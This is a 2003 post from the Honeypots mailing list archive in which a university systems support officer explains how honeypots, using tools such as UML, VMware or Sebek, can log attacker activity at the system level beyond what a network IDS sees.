Honeypots mailing list archives

Re: logging facility

From: "Peter Bates" <Peter.Bates () lshtm ac uk>
Date: Thu, 28 Aug 2003 11:03:52 +0100


Hello all...

<Motayyam79 () aol com> 28/08/03 01:19:09 >>>
Fine, but an IDS can be deployed on a network that doesn't have any 
production traffic.  
What logging facilities does a honeypot use that makes it more stronger 
than normal systems?


As others have mentioned, part of the 'unique selling points' of honeypots are that you can monitor down to the system 
level itself, possibly using things like UML/VMware, or solutions like Sebek.

An IDS, even on a network with no production traffic (and hence a reduction in the amount of 'traffic' you have to 
analyze) will still not necessarily capture key strokes from a compromised SSH server, or IRC over SSL... you'll see 
'traffic', but not get the added benefit of being able to potentially see things from the 'outside in'.

...


--------------------------------------------------------------------------------------------------->
Peter Bates, Systems Support Officer, Network Support Team.
London School of Hygiene & Tropical Medicine.
Telephone:0207-958 8353 / Fax: 0207- 636 9838

Current thread:

Re: logging facility, (continued)
- - Re: logging facility Richard Stevens (Aug 28)
  - Re: logging facility KeyFocus (Aug 28)
    - Re: logging facility Floydman (Aug 28)
  - Re: logging facility Floydman (Aug 28)
- Re: logging facility Motayyam79 (Aug 28)
  - Re: logging facility KeyFocus (Aug 28)
    - Re: logging facility urbn (Aug 29)
    - Re: logging facility KeyFocus (Aug 29)
  - Re: logging facility Valdis . Kletnieks (Aug 28)
  - Re: logging facility Edward Balas (Aug 29)
- Re: logging facility Peter Bates (Aug 28)
- Re: logging facility Ryan Barnett (Aug 29)